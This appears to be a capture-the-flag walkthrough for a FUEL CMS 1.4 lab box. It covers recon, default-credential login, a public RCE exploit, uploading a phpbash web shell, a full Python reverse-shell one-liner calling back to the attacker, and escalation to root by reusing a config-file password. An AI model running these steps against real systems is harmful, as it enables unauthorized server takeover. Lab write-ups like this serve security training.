• nmap
  • searchsploit
  • python
  • netcat

Start with an nmap scan: $ sudo nmap -A -oA nmap

The only open port is 80, a Apache/2.4.18 web server. View the web page in a browser and we find it’s the default page for FUEL CMS 1.4, which also gives us some basic info about the CMS.

A quick Gobuster scan gives us nothing particularly useful: $ gobuster dir -u -w /usr/share/wordlists/dirb/common.txt

While Gobuster was running, read the CMS page. We find many config files are located in “fuel/application/config/” (such as database.php and config.php), and near the bottom it mentions a login page, /fuel, and gives default creds. Check the page and we can log in with them with full admin rights!

Browsing the Dashboard we find a few Upload areas. These could be promising.

Before going into that, start simply. Checking Searchsploit with $ searchsploit fuel gives us “fuelCMS 1.4.1 - Remote Code Execution”. Sounds good. Copy it to our working directory with $ searchsploit -m linux/webapps/47138.py

Edit the file so the URL in the Python script matches the box script. You’ll also need to make sure Burp Suite is open, and turn off Intercept; alternatively, remove the two references to the proxy in the script.

Then run the Python script (using Python 2, as the script is incompatible with Python 3 - $ python 47138.py). You’ll be presented with a cmd: prompt. Try some things, such as cmd:ls and cmd:whoami to determine you’re in - note you’ll have to scroll up past the rubbish to get the actual result.

This shell is horrible, though, so let’s try and upgrade it. There is a browser-based php shell called phpbash, available at https://github.com/Arrexel/phpbash/blob/master/phpbash.php. Download the raw script to your machine with wget, set up a local server with $ python3 -m http.server 4444, then download the file to the remote machine using cmd:wget <your-THM-IP>:4444/phpbash.php. Then, in a browser, visit and you get a better shell.

We can further improve the shell by making it a Python one, using a script from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#python. Change the script to include your IP, set up a netcat listener on your machine on port 4242 with $ nc -lvnp 4242, and when you run it (in the phpbash shell - it won’t work in the cmd one) your netcat will give you a shell.

This is the Python reverse shell code: www-data@ubuntu:/var/www/html#:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

This shell can be further upgraded, first by running $ python3 -c 'import pty;pty.spawn("/bin/bash")', then $ export TERM=xterm, backgrounding this shell with Ctrl-Z, then $ stty raw -echo; fg. This gives us a nice, stable, interactive shell :)

Now we can get the first flag with www-data@ubuntu:/var/www/html$ cat /home/www-data/flag.txt. However, access to root ($ ls /root) is unsurprisingly denied.

We’ll need to privesc. $ sudo -l and $ sudo -i gives us nothing, and there are no SUIDs found with $ find / -perm -u=s -type f 2>/dev/null

Let’s check the config files earlier, especially as one of them mentioned usernames and passwords. Change directory with $ cd fuel/application/config, and then search all the files for the phrase “password” using grep: $ grep -ni password *.

One result looks interesting, line 80 of “database.php”: database.php:80: 'password' => 'mememe',.

$ cat database.php and have a read about line 80 - it suggests the password is for root!

Try it with $ su root and the password, and success! We get a # shell, and # whoami confirms we’re root.

Now simply # cat /root/root.txt.